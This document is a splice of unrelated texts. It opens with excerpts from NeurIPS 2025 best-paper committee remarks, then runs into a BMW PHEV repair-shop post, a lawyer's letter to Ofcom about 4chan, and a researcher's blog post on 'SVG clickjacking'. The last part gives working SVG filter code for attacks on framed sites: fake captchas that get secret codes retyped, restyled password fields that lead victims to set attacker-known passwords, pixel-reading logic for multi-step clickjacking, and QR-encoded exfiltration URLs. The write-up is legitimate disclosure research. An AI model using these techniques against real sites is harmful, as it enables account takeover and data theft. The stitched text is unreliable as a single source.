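M_T(C_0) \;=\; O\!\bigl(\sqrt{d}\bigr) \ \ \text{for some such } C_0,
\qquad
M_{\mathrm{std}}(C) \;=\; \mathrm{Ldim}(C) \;=\; d,
```

which is the quadratic gap between the two settings highlighted by the committee below.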
Reflections from the Selection Committee
This paper presents a breakthrough in learning theory, deserving the NeurIPS Best Paper Runner-Up award for its elegant, comprehensive, and definitive resolution of a 30-year-old open problem. The authors have not only precisely quantified the optimal mistake bound for transductive online learning as Ω(√d), but they have also achieved a tight match with an O(√d) upper bound. This establishes a quadratic gap between transductive and standard online learning, a result that represents an exponential leap beyond all previous logarithmic lower bounds and dramatically highlights the theoretical value of unlabeled data in this setting—a crucial insight distinct from its more limited role in PAC learning.
The novelty and ingenuity of their proof techniques are quite remarkable. For the lower bound, the adversary employs a sophisticated strategy that balances forcing mistakes with carefully managing the shrinking of the version space, leveraging the concept of “paths in trees” as a fundamental underlying structure. The upper bound, demonstrating the learnability within O(√d) mistakes, introduces an innovative hypothesis class construction that embeds a “sparse encoding” for off-path nodes – a probabilistic design where most off-path labels are zero, but the rare ones carry immense information. The learner’s strategy to exploit this class is equally brilliant, integrating several non-standard sophisticated techniques: “Danger Zone Minimization” to control the instance sequence presented by the adversary, “Splitting Experts” via a multiplicative weights approach to handle uncertainty about a node’s on-path status, and a strategic “Transition to Halving” once sufficient information is gathered from the sparsely encoded off-path labels. This intricate interplay between a cleverly constructed hypothesis class and a highly adaptive learning algorithm showcases a masterclass in theoretical analysis and design.
Superposition Yields Robust Neural Scaling
Abstract
The success of today’s large language models (LLMs) depends on the observation that larger models perform better. However, the origin of this neural scaling law, that loss decreases as a power law with model size, remains unclear. We propose that representation superposition, meaning that LLMs represent more features than they have dimensions, can be a key contributor to loss and cause neural scaling. Based on Anthropic’s toy model, we use weight decay to control the degree of superposition, allowing us to systematically study how loss scales with model size. When superposition is weak, the loss follows a power law only if data feature frequencies are power-law distributed. In contrast, under strong superposition, the loss generically scales inversely with model dimension across a broad class of frequency distributions, due to geometric overlaps between representation vectors. We confirmed that open-sourced LLMs operate in the strong superposition regime and have loss scaling inversely with model dimension, and that the Chinchilla scaling laws are also consistent with this behavior. Our results identify representation superposition as a central driver of neural scaling laws, providing insights into questions like when neural scaling laws can be improved and when they will break down.
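Schematically, with m for the model (representation) dimension, L for the loss, and p_i for the feature frequencies (notation assumed, not the paper's exact symbols):

```latex
\text{strong superposition:}\quad L(m) \;\propto\; \frac{1}{m}
\quad\text{across a broad class of frequency distributions};
\qquad
\text{weak superposition:}\quad L(m)\ \text{follows a power law only if } p_i \text{ is power-law distributed}.
```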
Reflections from the Selection Committee
This paper moves beyond observation of neural scaling laws—the empirically established phenomenon in which model loss exhibits a power-law decrease as model size, dataset size, or computational resources are increased—to demonstrate that representation superposition constitutes the primary mechanism governing these laws. The authors introduce a controlled "toy model" to examine how superposition and data structure affect the scaling of loss with model size, and demonstrate that under strong superposition, where features overlap, the loss scales consistently as an inverse power law with respect to the model dimension. The core findings are supported by a series of carefully designed experiments and offer fresh insights into an important research area.
The selection of these papers reflects the remarkable breadth of research presented at NeurIPS 2025, spanning generative modeling, reinforcement learning, natural language processing, learning theory, neural scaling, and benchmarking methodologies. The diversity of topics among the awarded papers demonstrates the vibrant and multifaceted nature of machine learning research.
We extend our congratulations to all the award recipients and look forward to seeing these works presented at the conference this December! Please note that the award certificates will be given out during the papers' respective oral sessions by the session chairs.
We would also like to extend our gratitude and appreciation to the members of the Best Paper Award Committee listed here.
Best Paper Award Committee for the Main and Datasets & Benchmarks Tracks
BMW PHEV (2021+) iBMUCP Post-Crash Recovery: when EU engineering becomes a synonym for "unrepairable" and "generating waste".
If you own a BMW PHEV — or if you’re an insurance company — every pothole, every curb impact, and even every rabbit jumping out of a bush represents a potential €5,000 cost, just for a single fuse inside the high-voltage battery system.
This "safety fuse" is designed to shut the system down the moment any crash event is detected. That sounds safe, but it is extremely expensive. Theoretically, insurance for a BMW PHEV should be three times higher than for an ICE car or an EV.
Unfortunately, that’s not the only issue.
BMW has over-engineered the diagnostic procedure to such a level that even their own technicians often do not know the correct replacement process. And it gets worse: the original iBMUCP module, which integrates the pyrofuse, contactors, BMS and internal copper-bonded circuitry, is fully welded shut. There are no screws, no service openings, and it is not designed to be opened, even though the pyrofuse and contactors are technically replaceable components. Additionally, the procedure requires flashing the entire vehicle both before and after the replacement, which adds several hours to the process and increases the risk of bricked components, which can raise the recovery cost by a factor of 10.
But that is still not the only problem.
Even after we managed to open the unit and access everything inside, we discovered that the Infineon TC375 MCU is fully locked. Both the D-Flash sectors and crash-flag areas are unreadable via DAP or via serial access.
Meaning: even if you replace the pyrofuse, you still cannot clear the crash flag, because the TC375 is cryptographically locked.
This leaves only one method:
➡️ Replace the entire iBMUCP module with a brand-new one. (1100€ + tax for faulty fuse)
And the registration of the new component is easily one of the worst procedures we have ever seen. You need an ICOM, IMIB, and AOS subscription — totalling over €25,000 in tools — just to replace a fuse. (Even though we managed to activate this one with the IMIB, the full toolset will still be necessary in some situations.)
Yes, you read that correctly, 25,000€
Many vehicles designed and produced in Europe — ICE, PHEV, and EV — have effectively become a misleading ECO exercise. Vehicles marketed as “CO₂-friendly” end up producing massive CO₂ footprints through forced services, throw-away components, high failure rates, unnecessary parts-manufacturing cycles, and overcomplicated service procedures, far larger than what the public is told. If we are destroying our ICE automotive industry based on EURO norms, who is calculating the real ECO footprint of replacement-part manufacturing, unnecessary servicing and the real cost of waste?
We saw this years ago on diesel and petrol cars:
DPF failures, EGR valves, high-pressure pumps, timing belts running in oil, low quality automatic transmissions, and lubrication system defects. Everyone calculates the CO₂ footprint of a moving vehicle — nobody calculates the CO₂ footprint of a vehicle that is constantly broken and creating waste.
ISTA’s official iBMUCP replacement procedure is so risky that if you miss one single step — poorly explained within ISTA — the system triggers ANTITHEFT LOCK.
This causes the balancing controller to wipe and lock modules.
Meaning: even in an authorised service centre, the system can accidentally delete the configuration, and you end up needing not only a new iBMUCP but also a full set of new battery modules.
Yes — replacing a fuse can accidentally trigger the replacement of all healthy HV modules, costing €6,000+ VAT per module, plus a massive unknown CO₂ footprint.
This has already happened to several workshops in the region.
The next problem: BMW refuses to provide training access for ISTA usage. We submitted two official certification requests — both were rejected by the central office in Austria, which is borderline discriminatory.
One more problem: battery erasure can happen at the OEM and it can happen in our or any other third-party workshop, but if the procedure was started in workshop 1, it cannot be continued in workshop 2. If battery damage happens in our workshop during a fuse change and a battery swap is then needed, neither we nor even an OEM workshop will cover the cost of a completely new battery pack, which heavily increases ownership costs.
All of this represents unnecessary complexity with no meaningful purpose.
While Tesla’s pyrofuse costs €11 and the BMS reset is around 50€, allowing the car to be safely restored, BMW’s approach borders on illogical engineering, with no benefit to safety, no benefit to anti-theft protection — the only outcome is the generation of billable labour hours and massive amounts of needless electronic/lithium waste.
Beyond that, we are actively working on breaking the JTAG/DAP protection to gain direct access to the D-Flash data and decrypt its contents, together with our colleagues from Hungary. The goal is to simplify the entire battery-recovery procedure, reduce costs, and actually deliver the CO₂ reduction the EU keeps promising, since the manufacturers clearly won’t.
Part number: 61 27 8 880 208
Faults:
21F2A8 High-voltage battery unit, terminal, high-voltage battery safety capsule: defective trigger/control electronics
21F35B High-voltage battery unit, voltage and electric current sensor, current: counter for the reuse of cell modules exceeded (safety function)
21F393 High-voltage battery unit, fault cumulative: memory of faults that prevent active transport
3B001D High-voltage battery unit, contactor excitation controller circuit breakers: double fault
21F37E Collision detection: collision detected due to ACSM signal
21F04B High-voltage battery unit, safety function: reset command units executed
OEM service cost: €4,000 + tax (approx.; if you have a BMW quote, send it to us)
OEM iBMUCP : 1100€+tax
Labor hours: 24h – 50h
EVC: 2500€+tax (full service)
It is cheaper to change the LG battery on a Tesla than to change a fuse on a BMW PHEV, and probably with a smaller CO₂ footprint too.
If you want to book your service with EV CLINIC:
Zagreb 1: www.evclinic.hr
Berlin: www.evclinic.de
Slovenija: www.evclinic.si
Serbia: www.evclinic.rs
This is a continuation of the Ofcom Files, a series of First Amendment-protected public disclosures designed to inform the American and British public about correspondence that the UK’s censorship agency, Ofcom, should prefer to keep secret. See Part 1 , Part 2 , and Part 3 .
We heard from Ofcom again today.
The agency writes:
The full letter Ofcom attached to their e-mail was full of legally illiterate nonsense claiming extraterritorial power to enforce their censorship laws against Americans in the United States.
Bryan Lunduke highlighted the key bits over on X. The full letter is at the bottom of this post.
The United Kingdom’s Ofcom has sent yet another threatening letter to 4chan (a US company).
After 4chan refused to pay fines to a foreign government, the United Kingdom says they are “expanding the scope of the investigation into 4chan”.
UK’s Ofcom states that United Kingdom… pic.twitter.com/nNhhCmHKsa
— The Lunduke Journal (@LundukeJournal) December 4, 2025
We replied as follows:
—
Sirs,
Last night Sarah Rogers, the United States Under Secretary of State for Public Diplomacy, let it be known on GB News , in London, that the United States Congress is considering introducing a federal version of the GRANITE Act.
The GRANITE Act , at state level, is a foreign censorship shield law reform proposal I threw together exactly 51 days ago on my personal blog. Colin Crossman, Wyoming’s Deputy Secretary of State, turned it into a bill . Now, it seems, very dedicated staffers in Congress and our principled elected representatives are keen to make it a federal law.
The proposal was inspired by your agency’s censorship letters, letters targeting Americans in America for conduct occurring wholly and exclusively in America, letters just like this one and the dozen others you’ve sent to my countrymen over the last eleven months.
It was also inspired by the passive-aggressive phone call I had with officials from your Home Office in 2023 asking me how my clients would implement your rules because, according to them, my clients’ users would demand that they comply (as far as I am aware, of my clients’ tens of millions of users among their various websites, not a single one has asked to be censored by the British). I replied that if your country wanted to censor my clients, the British Army would need to commence a ground invasion of the United States and seize their servers by force. That answer remains unchanged.
4chan is a website where users are free to remain anonymous. Your “age assurance” rules would destroy anonymity online, which is protected by the First Amendment. Accordingly, 4chan will not be implementing your “age assurance” rules.
Prompt and voluntary cooperation with law enforcement on child safety issues, including UK law enforcement, is what really matters for children’s safety online. That work happens quietly and non-publicly with officials who are tasked with performing it, namely, the police. My client will not be working with you on that important work because your agency is a censorship agency, not a law enforcement agency. Ofcom lacks the competence and the jurisdiction to do the work that actually matters in this space.
Regardless of whether GRANITE makes it on the books or not, and I will do everything in my personal power to ensure that it does, my clients don’t answer to you, 4chan included, because of the First Amendment. But then, Ofcom already knew that.
I copy the U.S. government and government officials in several states. My client reserves all rights.
Preston Byrne
—
Pretty sure my invitation to Number 10’s Christmas party is going to get lost in the post this year.
There is a possible future, and a very near one, in which it will be utterly impossible for foreign governments to send these notices to American citizens – notices I have been parrying, professionally, for eight years.
America needs to protect her builders from this foreign overreach. I am extremely hopeful that the U.S. Congress and the White House will seal the deal and secure the American-led future of the Internet for decades to come. We’re not there yet, but we’re close.
Clickjacking is a classic attack that consists of covering up an iframe of some other website in an attempt to trick the user into unintentionally interacting with it. It works great if you need to trick someone into pressing a button or two, but for anything more complicated it’s kind of unrealistic.
I’ve discovered a new technique that turns classic clickjacking on its head and enables the creation of complex interactive clickjacking attacks, as well as multiple forms of data exfiltration.
I call this technique “SVG clickjacking”.
The day Apple announced its new Liquid Glass redesign was pretty chaotic. You couldn’t go on social media without every other post being about the new design, whether it was critique over how inaccessible it seemed, or awe at how realistic the refraction effects were.
Drowning in the flurry of posts, a thought came to mind - how hard would it be to re-create this effect? Could I do this, on the web, without resorting to canvas and shaders? I got to work, and about an hour later I had a pretty accurate CSS/SVG recreation of the effect 1 .
You can drag around the effect with the bottom-right circle control thing in the demo above (chrome/firefox desktop, chrome mobile).
Note: This demo is broken in Safari, sorry.
My little tech demo made quite a splash online, and even resulted in a news article with what is probably the wildest quote about me to date: “Samsung and others have nothing on her” .
A few days passed, and another thought came to mind - would this SVG effect work on top of an iframe?
Like, surely not? The way the effect “refracts light” 2 is way too complex to work on a cross-origin document.
But, to my surprise, it did.
The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document?
This got me wondering - do any of the other filters work on iframes, and could we turn that into an attack somehow? It turns out that it’s all of them, and yes!
I got to work, going through every <fe*> SVG element and figuring out which ones can be combined to build our own attack primitives.
These filter elements take in one or more input images, apply operations to them, and output a new image. You can chain a bunch of them together within a single SVG filter, and refer to the output of any of the previous filter elements in the chain.
Let’s take a look at some of the more useful base elements we can play with:
That’s quite a selection of utilities!
If you’re a demoscener 3 you’re probably feeling right at home. These are the fundamental building blocks for many kinds of computer graphics, and they can be combined into many useful primitives of our own. So let’s see some examples.
I’ll start off with an example of basic data exfiltration. Suppose you’re targeting an iframe that contains some sort of sensitive code. You could ask the user to retype it by itself, but that’d probably seem suspicious.
What we can do instead is make use of feDisplacementMap to make the text seem like a captcha! This way, the user is far more likely to retype the code.
Here is your secret code:
6c79 7261 706f 6e79
Don't share it with anyone!
Complete a captcha
What's written above?
Good girl!!
(tap/click to edit if you're not a girl)
<iframe src = "..." style = "filter:url(#captchaFilter)" ></iframe>
<svg width = "768" height = "768" viewBox = "0 0 768 768" xmlns = "http://www.w3.org/2000/svg" >
<filter id = "captchaFilter" >
<feTurbulence
type = "turbulence"
baseFrequency = "0.03"
numOctaves = "4"
result = "turbulence" />
<feDisplacementMap
in = "SourceGraphic"
in2 = "turbulence"
scale = "6"
xChannelSelector = "R"
yChannelSelector = "G" />
</filter>
</svg>
Note: Only the part inside the <filter> block is relevant, the rest is just an example of using filters.
Add to this some color effects and random lines , and you’ve got a pretty convincing cap - tcha!
Out of all the attack primitives I’ll be sharing, this one is probably the least useful as sites rarely allow you to frame pages giving out magic secret codes. I wanted to show it though, as it’s a pretty simple introduction to the attack technique.
Still, it could come in handy because often times you’re allowed to frame read-only API endpoints, so maybe there’s an attack there to discover.
The next example is for situations where you want to trick someone into, for example, interacting with a text input. Oftentimes the inputs have stuff like grey placeholder text in them, so showing the input box by itself won’t cut it.
Let’s take a look at our example target (try typing in the box).
Set a new password
too short
In this example we want to trick the user into setting an attacker-known password, so we want them to be able to see the text they’re entering, but not the grey placeholder text, nor the red “too short” text.
Let’s start off by using feComposite with arithmetic to make the grey text disappear. The arithmetic operation takes in two images, i1 (in=...) and i2 (in2=...), and lets us do per-pixel maths with k1, k2, k3, k4 as the arguments, according to this formula 4 : result = k1*i1*i2 + k2*i1 + k3*i2 + k4.
Set a new password
too short
<feComposite operator = arithmetic
k1 = 0 k2 = 4 k3 = 0 k4 = 0 />
Tip! You can leave out the in/in2 parameters if you just want it to be the previous output.
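To see why k2 = 4 kills the grey placeholder but leaves the black text alone, here is a rough single-channel Python sketch of the arithmetic operator (a simplification: real SVG filters apply this per RGBA channel, usually on premultiplied values in linearRGB, and the sample luminance values below are made up):

def fe_composite_arithmetic(i1, i2, k1=0.0, k2=0.0, k3=0.0, k4=0.0):
    # Per-pixel formula from the SVG spec, clamped to the valid range.
    return max(0.0, min(1.0, k1 * i1 * i2 + k2 * i1 + k3 * i2 + k4))

# Illustrative values: white background, grey placeholder text, black text.
for name, value in [("white bg", 1.00), ("grey text", 0.65), ("black text", 0.05)]:
    print(name, "->", fe_composite_arithmetic(value, value, k2=4.0))
# white bg   -> 1.0  (unchanged)
# grey text  -> 1.0  (pushed past 1.0 and clipped, so it vanishes into the background)
# black text -> 0.2  (still clearly darker than the background)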
It’s getting there - by multiplying the brightness of the input we’ve made the grey text disappear, but now the black text looks a little suspicious and hard to read, especially on 1x scaling displays.
We could play around with the arguments to find the perfect balance between hiding the grey text and showing the black one, but ideally we’d still have the black text look the way it usually does, just without any grey text. Is that possible?
So here’s where a really cool technique comes into play - masking. We’re going to create a matte to “cut out” the black text and cover up everything else. It’s going to take us quite a few steps to get to the desired result, so let’s go through it bit-by-bit.
We start off by cropping the result of our black text filter with feTile.
Set a new password
too short
<feTile x = 20 y = 56 width = 184 height = 22 />
Note: Safari seems to be having some trouble with feTile, so if the examples flicker or look blank, read this post in a browser such as Firefox or Chrome. If you're writing an attack for Safari, you can also achieve cropping by making a luma matte with feFlood and then applying it.
Then we use feMorphology to increase the thickness of the text.
Set a new password
too short
<feMorphology operator = erode radius = 3 result = thick />
Now we have to increase the contrast of the mask. I’m going to do it by first using feFlood to create a solid white image, which we can then feBlend with difference to invert our mask. And then we can use feComposite to multiply 5 the mask for better contrast.
Set a new password
too short
<feFlood flood-color = #FFF result = white />
<feBlend mode = difference in = thick in2 = white />
<feComposite operator = arithmetic k2 = 100 />
We have a luma matte now! All that’s left is to convert it into an alpha matte with feColorMatrix, apply it to the source image with feComposite, and make the background white with feBlend.
Set a new password
too short
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite in = SourceGraphic operator = in />
<feBlend in2 = white />
Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.
There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.
Set a new password
too short
Enter your e-mail address:
<filter>
<feComposite operator = arithmetic
k1 = 0 k2 = 4 k3 = 0 k4 = 0 />
<feTile x = 20 y = 56 width = 184 height = 22 />
<feMorphology operator = erode radius = 3 result = thick />
<feFlood flood-color = #FFF result = white />
<feBlend mode = difference in = thick in2 = white />
<feComposite operator = arithmetic k2 = 100 />
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite in = SourceGraphic operator = in />
<feTile x = 21 y = 57 width = 182 height = 20 />
<feBlend in2 = white />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 1 k4 = 0.02 />
</filter>
You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.
And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.
The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out 6 . Despite that, it is very powerful if you get creative with it.
On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.
Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.
<--- very cool! click to change color
For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.
All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.
<--- very cool! click to change color
<feTile x = "50" y = "50"
width = "4" height = "4" />
<feTile x = "0" y = "0"
width = "100%" height = "100%" />
Let’s start off by using two copies of the feTile filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image. The result is that we now have the entire screen filled with the color of the area we are interested in.
<--- very cool! click to change color
<feComposite operator = arithmetic k2 = 100 />
We can turn this result into a binary on/off value by using feComposite’s arithmetic the same way as in the last section, but with a way larger k2 value. This makes it so that the output image is either completely black or completely white.
<--- very cool! click to change color
<feColorMatrix type = matrix
values = "0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" result = mask />
<feGaussianBlur in = SourceGraphic
stdDeviation = 3 />
<feComposite operator = in in2 = mask />
<feBlend in2 = SourceGraphic />
And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.
So that’s how you can find out whether a pixel is black and use that to toggle a filter!
<--- very cool! click to change color
Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!
How can we adapt this technique to work with arbitrary colors and textures?
<--- very cool! click to change color
<!-- crop to first stripe of the flag -->
<feTile x = "22" y = "22"
width = "4" height = "4" />
<feTile x = "0" y = "0" result = "col"
width = "100%" height = "100%" />
<!-- generate a color to diff against -->
<feFlood flood-color = "#5BCFFA"
result = "blue" />
<feBlend mode = "difference"
in = "col" in2 = "blue" />
<!-- k4 is for more lenient threshold -->
<feComposite operator = arithmetic
k2 = 100 k4 = -5 />
<!-- do the masking and blur stuff... -->
...
The solution is pretty simple - we can simply use feBlend’s difference combined with a feColorMatrix to join the color channels to turn the image into a similar black/white matte as before. For textures we can use feImage, and for non-exact colors we can use a bit of feComposite’s arithmetic to make the matching threshold more lenient.
And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.
But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.
By using feBlend and feComposite, we can recreate all logic gates and make SVG filters functionally complete. This means that we can program anything we want, as long as it is not timing-based 7 and doesn’t take up too many resources 8.
NOT: <feBlend mode=difference in2=white />
AND: <feComposite operator=arithmetic k1=1 />
OR: <feComposite operator=arithmetic k2=1 k3=1 />
XOR: <feBlend mode=difference in=a in2=b />
NAND: (AND + NOT)
NOR: (OR + NOT)
XNOR: (XOR + NOT)
These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:
This is a full adder circuit. This filter implements the logic gates for the output and for the carry bit using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.
<!-- util -->
<feOffset in = "SourceGraphic" dx = "0" dy = "0" result = src />
<feTile x = "16px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = a />
<feTile x = "48px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = b />
<feTile x = "72px" y = "16px" width = "4" height = "4" in = src />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = c />
<feFlood flood-color = #FFF result = white />
<!-- A ⊕ B -->
<feBlend mode = difference in = a in2 = b result = ab />
<!-- [A ⊕ B] ⊕ C -->
<feBlend mode = difference in2 = c />
<!-- Save result to 'out' -->
<feTile x = "96px" y = "0px" width = "32" height = "32" result = out />
<!-- C ∧ [A ⊕ B] -->
<feComposite operator = arithmetic k1 = 1 in = ab in2 = c result = abc />
<!-- (A ∧ B) -->
<feComposite operator = arithmetic k1 = 1 in = a in2 = b />
<!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] -->
<feComposite operator = arithmetic k2 = 1 k3 = 1 in2 = abc />
<!-- Save result to 'carry' -->
<feTile x = "64px" y = "32px" width = "32" height = "32" result = carry />
<!-- Combine results -->
<feBlend in2 = out />
<feBlend in2 = src result = done />
<!-- Shift first row to last -->
<feTile x = "0" y = "0" width = "100%" height = "32" />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = lastrow />
<feOffset dx = "0" dy = "-32" in = done />
<feBlend in2 = lastrow />
<!-- Crop to output -->
<feTile x = "0" y = "0" width = "100%" height = "100%" />
Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.
Securify
Welcome to this secure application!
This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:
Securify
Welcome to this secure application!
Win free iPod by following the steps below.
1. Click here
2. Wait 3 seconds
3. Click
4. Click here
A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.
There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.
Anyways, let’s build out a logic tree for a filter-based attack, which can be expressed in logic gates 9 over four inputs read out of the frame: D (dialog visible), L (dialog loaded), C (checkbox checked), and R (red text visible, detected with feMorphology plus a check for red pixels).
And this is how we would implement it in SVG:
<!-- util -->
<feTile x = "14px" y = "4px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" />
<feColorMatrix type = matrix result = debugEnabled
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feFlood flood-color = #FFF result = white />
<!-- attack imgs -->
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = button1.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = loading.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = checkbox.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = button2.png ></feImage>
<feImage xlink:href = "data:..." x = 0 y = 0 width = 420 height = 220 result = end.png ></feImage>
<!-- D (dialog visible) -->
<feTile x = "4px" y = "4px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 100 k4 = -1 result = D />
<!-- L (dialog loaded) -->
<feTile x = "313px" y = "141px" width = "4" height = "4" in = SourceGraphic />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = "dialogBtn" />
<feBlend mode = difference in2 = white />
<feComposite operator = arithmetic k2 = 100 k4 = -1 result = L />
<!-- C (checkbox checked) -->
<feFlood flood-color = #0B57D0 />
<feBlend mode = difference in = dialogBtn />
<feComposite operator = arithmetic k2 = 4 k4 = -1 />
<feComposite operator = arithmetic k2 = 100 k4 = -1 />
<feColorMatrix type = matrix
values = "1 1 1 0 0
1 1 1 0 0
1 1 1 0 0
1 1 1 1 0" />
<feBlend mode = difference in2 = white result = C />
<!-- R (red text visible) -->
<feMorphology operator = erode radius = 3 in = SourceGraphic />
<feTile x = "17px" y = "150px" width = "4" height = "4" />
<feTile x = "0" y = "0" width = "100%" height = "100%" result = redtext />
<feColorMatrix type = matrix
values = "0 0 1 0 0
0 0 0 0 0
0 0 0 0 0
0 0 1 0 0" />
<feComposite operator = arithmetic k2 = 2 k3 = -5 in = redtext />
<feColorMatrix type = matrix result = R
values = "1 0 0 0 0
1 0 0 0 0
1 0 0 0 0
1 0 0 0 1" />
<!-- Attack overlays -->
<feColorMatrix type = matrix in = R
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = end.png operator = in />
<feBlend in2 = button1.png />
<feBlend in2 = SourceGraphic result = out />
<feColorMatrix type = matrix in = C
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = button2.png operator = in />
<feBlend in2 = checkbox.png result = loadedGraphic />
<feColorMatrix type = matrix in = L
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = loadedGraphic operator = in />
<feBlend in2 = loading.png result = dialogGraphic />
<feColorMatrix type = matrix in = D
values = "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0" />
<feComposite in = dialogGraphic operator = in />
<feBlend in2 = out />
Securify
Welcome to this secure application!
Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.
But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.
I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.
In fact…
I’ve actually managed to pull off this attack against Google Docs!
Take a look at the demo videos here (alt links: bsky , twitter ).
What this attack does is:
In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.
Google VRP awarded me $3133.70 for the find. That was, of course, right before they introduced a novelty bonus for new vulnerability classes. Hmph! 10
Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.
I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.
It turns out, though, that my SVG filters attack technique can be applied to QR codes as well!
The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.
But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?
Creating a QR code within an SVG filter is easier said than done, however. We can shape binary data into the shape of a QR code by using feDisplacementMap, but for a QR code to be scannable it also needs error correction data.
QR codes use Reed-Solomon error correction , which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.
Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person 11 to make a QR code generator in Minecraft , so I’ve already figured out the things necessary.
In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.
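For anyone curious what those lookup tables actually contain, here is a small Python sketch of the GF(256) log/antilog tables that QR error correction is built on (using the primitive polynomial 0x11D from the QR spec); this is standard Reed-Solomon bookkeeping rather than anything specific to the SVG filter:

# Build the GF(256) antilog (EXP) and log (LOG) tables once.
EXP = [0] * 512   # doubled so multiplications never need an explicit modulo
LOG = [0] * 256

value = 1
for power in range(255):
    EXP[power] = value
    LOG[value] = power
    value <<= 1
    if value & 0x100:        # reduce modulo the primitive polynomial 0x11D
        value ^= 0x11D
for power in range(255, 512):
    EXP[power] = EXP[power - 255]

def gf_mul(a, b):
    # Table-driven GF(256) multiplication, the core step when computing
    # Reed-Solomon error-correction codewords.
    if a == 0 or b == 0:
        return 0
    return EXP[LOG[a] + LOG[b]]

print(hex(gf_mul(0x53, 0xCA)))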
This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).
Hover to see QR
This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work, make sure you aren’t using any page zoom or unusual display scaling or color profile settings.
Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.
But yeah, that’s a QR code generator built inside an SVG filter!
Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.
So the attack scenario with the QR code is that you’d read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like https://lyra.horse/?ref=c3VwZXIgc2VjcmV0IGluZm8 and render it as a QR code.
